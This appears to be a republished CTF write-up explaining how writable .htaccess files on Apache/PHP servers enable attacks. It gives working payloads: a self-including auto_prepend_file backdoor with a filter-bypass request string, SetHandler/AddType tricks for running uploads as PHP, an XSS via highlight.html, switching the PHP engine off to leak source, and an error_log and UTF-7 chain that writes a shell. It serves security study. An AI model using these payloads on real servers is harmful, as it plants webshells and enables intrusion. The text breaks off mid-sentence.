

How to analyze the security problems caused by users tampering with server configuration through .htaccess

2025-01-15 Update. From: SLTechnology News&Howtos, Network Security


Shulou (Shulou.com) 06/01 Report

This article explains in detail how to analyze the security problems that arise when a user can tamper with server configuration through .htaccess. It is shared here as a reference; after reading it you should have a working understanding of the technique.

Preface

Most people who have played CTF know that .htaccess is a common tool in file-upload challenges. A shallow understanding of it is not enough in many cases, however, such as the challenge below. The challenge source is shown first; this example is used to gain a deeper understanding of .htaccess and enter its world.

Audit the code first. Its logic is not hard, but without a thorough understanding of .htaccess the challenge is difficult to solve, which is what makes it a good one. The server first scans the current directory and deletes every file that is not index.php; it then includes fl3g.php; it then takes a file name and file content from the request and filters both; finally it appends a line of extraneous characters after the content and writes the file.

Background

What is .htaccess

The .htaccess file (or "distributed configuration file"), whose full name is Hypertext Access, provides a way to change configuration per directory: a file containing one or more directives is placed in a particular directory and applies to that directory and all of its subdirectories. The directives available to an ordinary user are limited; the administrator controls which ones are honoured through Apache's AllowOverride directive. In short, .htaccess is a configuration file for the Apache server that only governs the directory it sits in and the directories below it. Note that AllowOverride None disables .htaccess entirely, the php_value and php_flag directives used below require AllowOverride Options (or All) and only work when PHP runs as an Apache module (mod_php), and handler directives such as SetHandler and AddType require AllowOverride FileInfo.

What can .htaccess do?

Through .htaccess files we can do things such as 301 redirects, custom 404 error pages, changing how a file extension is handled, and forbidding directory listings. Take changing how an extension is handled as an example, in the classic beginner file-upload problem: if .htaccess itself can be uploaded, we can write the following into it.

SetHandler application/x-httpd-php

This directive is scoped to the uploaded file name; the enclosing angle-bracket container was lost when the page was extracted, and the usual form is a FilesMatch block such as <FilesMatch "s1mple"> ... </FilesMatch> around it. We then upload a file named s1mple with PHP code inside. The server parses s1mple as PHP because it sits in the same directory as the .htaccess file, whose directives now apply to that directory and its subdirectories, so the uploaded file is executed. Alternatively, write AddType application/x-httpd-php .jpg to have .jpg files parsed as PHP. This is the simple case and needs no further repetition.

Going further with .htaccess

Using .htaccess to plant a backdoor

1. File inclusion: php_value auto_prepend_file followed by a file path (a relative path is resolved like any include, which by default covers the current upload directory). The name says what it does: the specified file is included before the script itself runs. One step further: what if we prepend the .htaccess file itself? Then whatever malicious code we put into .htaccess is included into every request. So we can write the following into .htaccess, with the malicious code placed directly after the # so that Apache treats the line as a comment while PHP, which parses the whole file, executes it:

php_value auto_prepend_file ".htaccess"
#

Let's test this locally on the challenge above by passing:

?filename=.htaccess&content=php_value%20auto_prepend_fi\%0ale%20".htaccess"%0a%23\

The content filter evidently blocks the word "file", so it is split across an Apache line continuation: a backslash immediately before a newline (%0a) makes Apache join the two lines, so it reads auto_prepend_file even though the filter never sees the whole word. The trailing backslash after the # (the PHP code calling phpinfo() sits between the # and that backslash) joins the extraneous line the server appends onto the comment line, so it never becomes a directive. Looking at the response, the first request does not trigger phpinfo. So what did the server do? Let's open the corresponding folder locally.

It turns out the first request only creates the .htaccess file; nothing has been prepended yet, because Apache reads .htaccess at the start of the request, before PHP writes it. Refresh the page and the payload works. Let's look at what .htaccess now contains.

The contents are clearly visible. Now imagine facing an upload challenge and uploading a .htaccess with exactly this content: a backdoor is created without uploading any other file (tested locally, works). If we write a one-line webshell instead of phpinfo(), it can be used directly: .htaccess prepends itself, so every PHP script in the directory now carries the webshell.

Two screenshots show that the exploitation succeeds: dir lists plenty of sensitive information. The same method works directly against the BUUCTF environment; the screenshots are attached in the original.
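The two backslash tricks in the payload above are easy to get wrong, so here is an added example (not the challenge's own code) that models the write-then-parse sequence offline: the content filter, the server appending its junk line, and Apache's backslash line continuation. The blocklist and the appended text are assumptions, since the page only shows that the word "file" is blocked and that something is appended; the Apache continuation rule (a backslash right before a newline joins the lines) is real.

```python
from typing import List, Optional

# Assumed: the page only shows that "file" is filtered; the other words are illustrative.
BLOCKLIST = ("file", "flag", "upload")
# Assumed placeholder for the "extraneous characters" the server appends after the content.
SERVER_SUFFIX = "\nJust one chance"


def passes_filter(content: str, blocklist=BLOCKLIST) -> bool:
    """Case-insensitive substring blocklist, in the spirit of the challenge's content check."""
    lowered = content.lower()
    return not any(word in lowered for word in blocklist)


def server_write(content: str) -> Optional[str]:
    """What ends up on disk: the content plus the server's junk line, or None if the filter rejects it."""
    if not passes_filter(content):
        return None
    return content + SERVER_SUFFIX


def apache_logical_lines(raw: str) -> List[str]:
    """Join backslash-continued lines the way Apache's config reader does: a backslash
    immediately before a newline is dropped together with the newline, so
    'auto_prepend_fi\\' + newline + 'le' is read as 'auto_prepend_file'."""
    joined = raw.replace("\\\n", "")
    return [ln for ln in joined.split("\n") if ln.strip()]


def active_directives(raw: str) -> List[str]:
    """Logical lines Apache actually evaluates; lines starting with '#' are comments."""
    return [ln for ln in apache_logical_lines(raw) if not ln.lstrip().startswith("#")]


def build_htaccess(php_code: str) -> str:
    """The payload from the text: split 'file' across a continuation so the filter never
    sees the whole word, then hide the PHP behind an Apache comment whose trailing
    backslash swallows the line the server appends.  Apache sees one directive and one
    comment; PHP, prepending the same file, outputs the '#' and runs php_code."""
    return (
        'php_value auto_prepend_fi\\\n'   # the filter sees only "auto_prepend_fi"
        'le ".htaccess"\n'                # Apache sees auto_prepend_file ".htaccess"
        '#' + php_code + '\\'             # comment for Apache, executable for PHP
    )


if __name__ == "__main__":
    stored = server_write(build_htaccess("<?php phpinfo(); ?>"))
    print("stored file:\n" + stored)
    print("Apache directives:", active_directives(stored))
```

Run it and compare the stored file with the directive list: the word "file" never appears in what the filter inspected, yet Apache evaluates a complete auto_prepend_file directive, and the appended junk is absorbed into the comment line rather than becoming a (syntax-breaking) directive of its own.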

2. XSS caused by .htaccess

This case is more interesting. We add the following to .htaccess, then visit index.php, and an alert pops up:

php_value highlight.html '"><script>alert(1);</script>'

(The script tags were stripped when the page was extracted, leaving only '> alert (1); '; the line above is the reconstructed form.) It works because index.php calls highlight_file() on itself, and highlight_file() writes the highlight.* ini values straight into the HTML it emits, so a value that closes the attribute can inject markup.

We only get one shot here, because index.php calls unlink() on every file in the directory that is not index.php, so our .htaccess is deleted once the request has been served.

The other highlight.* settings were tested in the same way and can also be used for XSS.

(highlight.string can also be used to pop an alert, but that variant was not reproduced here; readers may want to try it themselves.)

After testing, all of the settings above can be used to pop an alert.

3. Source code disclosure by switching off the PHP engine through .htaccess

For this experiment I removed the highlight_file() line from the challenge so that the source is no longer shown. Now we get the source back by tampering with the server's parsing engine: all we need is to switch the PHP engine off for the directory. Put the directive that does this into .htaccess (in mod_php it is php_flag engine off).

The experiment shows that the code is now displayed. We had deleted the highlight_file(__FILE__) call (where the arrow points in the original screenshot), yet the code is shown, because PHP's engine is switched off for this directory and index.php is served as a plain file. There is also the unlink() call in the code, but refreshing still does not delete .htaccess: the code has lost its engine and is never parsed, so it cannot delete our .htaccess. .htaccess really is a magic weapon!

4. .htaccess redefines the error log and a custom include path

This method is another solution to the challenge, and it is the intended one.

First let's look at custom error reporting. The code must produce an error, because fl3g.php does not exist and include_once fails. So set php_value error_log G:\phpstudy\tmp\fl3g.php in .htaccess, refresh the page, and the error is written.

Check the effect: go to that directory, find fl3g.php, open it, and it indeed contains the error report.

Now we have the idea: use error_log to redirect error records into a file of our choosing and write a shell into it. How? Because fl3g.php does not exist, include_once reports an error; if we also set a custom include_path, the failed-include warning quotes that include_path, so the server writes two messages into our error file and our include_path value lands in it. Experiment confirms this. The reason for UTF-7 encoding is that what we write into the error file is HTML-encoded (html_errors is on), so the PHP tags are UTF-7-encoded to get around that encoding. The report level is set to 32767 (E_ALL) so that every possible error is reported and the shell is certain to be written.

Now that our message is on the server (pictured above), it is time to trigger the shell; this is the second step. fl3g.php now exists in the tmp directory and is not touched by the unlink loop, so we set include_path to the directory containing it. The remaining question is how our shell gets parsed. First confirm that the file really contains the UTF-7 text, then set the encoding: php_value zend.script_encoding "UTF-7" makes the server treat scripts in this directory as UTF-7, so the include decodes the file accordingly and the shell executes. (zend.script_encoding only takes effect when zend.multibyte is enabled, so set php_value zend.multibyte 1 alongside it.)

So the overall process is: first redirect the error log so that the shell is written into it, using error level 32767 so that everything is reported; then bypass


© 2024 shulou.com SLNews company. All rights reserved.
